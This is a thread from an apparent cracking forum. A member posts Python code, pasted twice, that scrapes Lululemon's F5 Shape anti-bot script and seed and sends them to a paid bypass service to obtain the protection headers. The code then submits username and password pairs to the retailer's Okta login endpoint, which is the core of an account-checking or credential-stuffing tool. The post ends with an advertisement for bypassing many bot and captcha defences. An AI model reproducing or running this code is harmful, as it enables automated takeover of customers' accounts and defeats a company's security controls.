Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   479

Lululemon's login source code has solved the verification of f5 shape

by sysdemo - 08 July, 2024 - 09:26 AM
This post is by a banned member (sysdemo) - Unhide
sysdemo  
Registered
113
Posts
29
Threads
2 Years of service
#1
OP 08 July, 2024 - 09:26 AM (This post was last modified: 08 July, 2024 - 09:28 AM by sysdemo.)
This is the code, please check
 
Code:
# -*- coding: iso-8859-1 -*-
from flask import Flask, request, jsonify
import requests
import json
import re

app = Flask(__name__)
session = requests.Session()
# captcha solver use https://www.clearcaptcha.com
CLEARCAPTCHA_API_KEY = 'test'
CAPTCHA_ENDPOINT = "http://api.clearcaptcha.com/captcha/shape"
MARRIOTT_URI = "https://shop.lululemon.com/account/login"
HEADER_KEY = "dwOClKrX"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
LOGIN_URL = "https://identity.lululemon.com/api/v1/authn"


jsurl = 'https://shop.lululemon.com/shared/chunk.273c0224d38f1ad8.js?async'
response = session.get(jsurl,verify=False)
if response.status_code == 200:
    jscontent = response.text
    print(jscontent)
else:
    print(f'StatusCode:{response.status_code}')
    
vmp_regexp=r'"(/shared/chunk\.273c0224d38f1ad8\.js\?seed=.*?)"'

seed_url = "https://shop.lululemon.com"+re.search(vmp_regexp, jscontent)[1]
response = session.get(seed_url,verify=False)
if response.status_code == 200:
    seed_content = response.text
    # print(seed_content)
else:
    print(f'StatusCode:{response.status_code}')

headers = {
        'Accept': 'application/json, text/plain, */*',
        'Accept-Encoding': 'gzip, deflate, br, zstd',
        'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
        'Content-Type': 'application/json',
        'Sec-Ch-Ua': '"Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
        'Sec-Ch-Ua-Mobile': '?0',
        'Sec-Ch-Ua-Model': '""',
        'Sec-Ch-Ua-Platform': '"Windows"',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
}

payload = {
    "token": CLEARCAPTCHA_API_KEY,
    "uri": MARRIOTT_URI,
    "jsurl": jsurl,
    "jscontent": jscontent,
    "seed_url": seed_url,
    "seed_content": seed_content,
    "header_key": HEADER_KEY,
    "user_agent": USER_AGENT,
    "payload": {
        "url": LOGIN_URL
        }
}



post_data=json.dumps(payload)
print(post_data)
response = session.post(CAPTCHA_ENDPOINT, headers=headers, data=post_data,verify=False)
if response.status_code == 200:
    response_data = response.json()
    print(response_data)
else:
    print({
        "error": "Failed to solve captcha",
        "status_code": response.status_code,
        "response": response.text
    }), response.status_code



headers = {
        'Accept': 'application/json, text/plain, */*',
        'Accept-Encoding': 'gzip, deflate, br, zstd',
        'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
        'Content-Type': 'application/json',
        'Origin': 'https://shop.lululemon.com',
        'Referer': 'https://shop.lululemon.com/',
        'Sec-Ch-Ua': '"Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
        'Sec-Ch-Ua-Mobile': '?0',
        'Sec-Ch-Ua-Model': '""',
        'Sec-Ch-Ua-Platform': '"Windows"',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
}
headers['X-dwOClKrX-a'] = response_data["data"]["X-dwOClKrX-a"]
headers['X-dwOClKrX-a0'] = response_data["data"]["X-dwOClKrX-a0"]
headers['X-dwOClKrX-a1'] = response_data["data"]["X-dwOClKrX-a1"]
headers['X-dwOClKrX-b'] = response_data["data"]["X-dwOClKrX-b"]
headers['X-dwOClKrX-c'] = response_data["data"]["X-dwOClKrX-c"]
headers['X-dwOClKrX-d'] = response_data["data"]["X-dwOClKrX-d"]
headers['X-dwOClKrX-f'] = response_data["data"]["X-dwOClKrX-f"]
headers['X-dwOClKrX-z'] = response_data["data"]["X-dwOClKrX-z"]
headers['X-Okta-User-Agent-Extended'] = "okta-auth-js/7.4.3"

jsondata={"username":"afdasfdsa@gmail.com","password":"123123"}
post_data=json.dumps(jsondata)
print(post_data)
response = requests.post("https://identity.lululemon.com/api/v1/authn", headers=headers, data=post_data,verify=False)
print(response.text)
This is the code, please check
 
Code:
 
# -*- coding: iso-8859-1 -*-
from flask import Flask, request, jsonify
import requests
import json
import re

app = Flask(__name__)
session = requests.Session()
# captcha solver use https://www.clearcaptcha.com
CLEARCAPTCHA_API_KEY = 'test'
CAPTCHA_ENDPOINT = "http://api.clearcaptcha.com/captcha/shape"
MARRIOTT_URI = "https://shop.lululemon.com/account/login"
HEADER_KEY = "dwOClKrX"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
LOGIN_URL = "https://identity.lululemon.com/api/v1/authn"


jsurl = 'https://shop.lululemon.com/shared/chunk.273c0224d38f1ad8.js?async'
response = session.get(jsurl,verify=False)
if response.status_code == 200:
    jscontent = response.text
    print(jscontent)
else:
    print(f'StatusCode:{response.status_code}')
    
vmp_regexp=r'"(/shared/chunk\.273c0224d38f1ad8\.js\?seed=.*?)"'

seed_url = "https://shop.lululemon.com"+re.search(vmp_regexp, jscontent)[1]
response = session.get(seed_url,verify=False)
if response.status_code == 200:
    seed_content = response.text
    # print(seed_content)
else:
    print(f'StatusCode:{response.status_code}')

headers = {
        'Accept': 'application/json, text/plain, */*',
        'Accept-Encoding': 'gzip, deflate, br, zstd',
        'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
        'Content-Type': 'application/json',
        'Sec-Ch-Ua': '"Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
        'Sec-Ch-Ua-Mobile': '?0',
        'Sec-Ch-Ua-Model': '""',
        'Sec-Ch-Ua-Platform': '"Windows"',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
}

payload = {
    "token": CLEARCAPTCHA_API_KEY,
    "uri": MARRIOTT_URI,
    "jsurl": jsurl,
    "jscontent": jscontent,
    "seed_url": seed_url,
    "seed_content": seed_content,
    "header_key": HEADER_KEY,
    "user_agent": USER_AGENT,
    "payload": {
        "url": LOGIN_URL
        }
}



post_data=json.dumps(payload)
print(post_data)
response = session.post(CAPTCHA_ENDPOINT, headers=headers, data=post_data,verify=False)
if response.status_code == 200:
    response_data = response.json()
    print(response_data)
else:
    print({
        "error": "Failed to solve captcha",
        "status_code": response.status_code,
        "response": response.text
    }), response.status_code



headers = {
        'Accept': 'application/json, text/plain, */*',
        'Accept-Encoding': 'gzip, deflate, br, zstd',
        'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
        'Content-Type': 'application/json',
        'Origin': 'https://shop.lululemon.com',
        'Referer': 'https://shop.lululemon.com/',
        'Sec-Ch-Ua': '"Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
        'Sec-Ch-Ua-Mobile': '?0',
        'Sec-Ch-Ua-Model': '""',
        'Sec-Ch-Ua-Platform': '"Windows"',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Site': 'same-origin',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
}
headers['X-dwOClKrX-a'] = response_data["data"]["X-dwOClKrX-a"]
headers['X-dwOClKrX-a0'] = response_data["data"]["X-dwOClKrX-a0"]
headers['X-dwOClKrX-a1'] = response_data["data"]["X-dwOClKrX-a1"]
headers['X-dwOClKrX-b'] = response_data["data"]["X-dwOClKrX-b"]
headers['X-dwOClKrX-c'] = response_data["data"]["X-dwOClKrX-c"]
headers['X-dwOClKrX-d'] = response_data["data"]["X-dwOClKrX-d"]
headers['X-dwOClKrX-f'] = response_data["data"]["X-dwOClKrX-f"]
headers['X-dwOClKrX-z'] = response_data["data"]["X-dwOClKrX-z"]
headers['X-Okta-User-Agent-Extended'] = "okta-auth-js/7.4.3"

jsondata={"username":"afdasfdsa@gmail.com","password":"123123"}
post_data=json.dumps(jsondata)
print(post_data)
response = requests.post("https://identity.lululemon.com/api/v1/authn", headers=headers, data=post_data,verify=False)
print(response.text)
www.clearcaptcha.com
There is nothing special about this website, just any captcha and shield can be solved and bypassed
bypass recaptcha, bypass hcaptcha, bypass akamai, bypass Perimeterx _px2, bypass Perimeterx _px3, bypass Incapsula, bypass reese84, bypass __utmvc,
bypass TLS, bypass shape, bypass datadome, bypass kasada, bypass aws-waf-token, bypass akamai bmp
This post is by a banned member (sysdemo) - Unhide
sysdemo  
Registered
113
Posts
29
Threads
2 Years of service
Bumped #2
OP 12 July, 2024 - 08:59 AM
This is a bump

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
 or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)

About Cracked.sh

Cracked.sh is a community forum that suits basically everyone. We provide cracking tutorials, tools, leaks, marketplace and much more stuff! You can also learn many things here, meet new friends and have a lot of fun!
If you would like to contact us, you can send our staff team a message.

Navigation

Extras

Help

Account